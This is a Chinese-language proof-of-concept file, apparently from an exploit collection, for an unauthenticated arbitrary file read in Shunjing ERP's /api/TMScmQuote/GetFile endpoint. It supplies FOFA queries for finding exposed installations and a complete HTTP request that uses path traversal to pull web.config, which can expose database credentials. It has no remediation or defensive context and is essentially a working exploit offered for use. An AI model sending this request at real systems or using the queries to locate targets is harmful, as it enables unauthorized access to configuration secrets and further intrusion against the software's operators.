POC/wpoc/顺景ERP/顺景ERP系统FullGuidFileName任意文件读取漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

25 lines
1.4 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 顺景ERP系统FullGuidFileName任意文件读取漏洞
顺景ERP是一款功能全面、高度集成、易于扩展的企业管理软件能够帮助制造企业实现智能化、精益化管理提升企业的竞争力和盈利能力。为企业提供全方位信息化的管理应用与支持例如在精密五金行业系统可根据企业的业务流程及特性提供针对性信息化管理方案在注塑行业系统具有完整的水口料管理方案对企业成本控制严谨到位在电子行业系统的BOM批量变更功能能快速准确进行物料变更并支持替代料功能等。顺景ERP TMScmQuote/GetFile 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
## fofa
```javascript
body="/api/DBRecord/getDBRecords"
body="顺景软件 WebAPI 服务端"
```
## poc
```javascript
GET /api/TMScmQuote/GetFile?FullGuidFileName=/../web.config&FileName= HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```
![image-20241211205713046](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412112057111.png)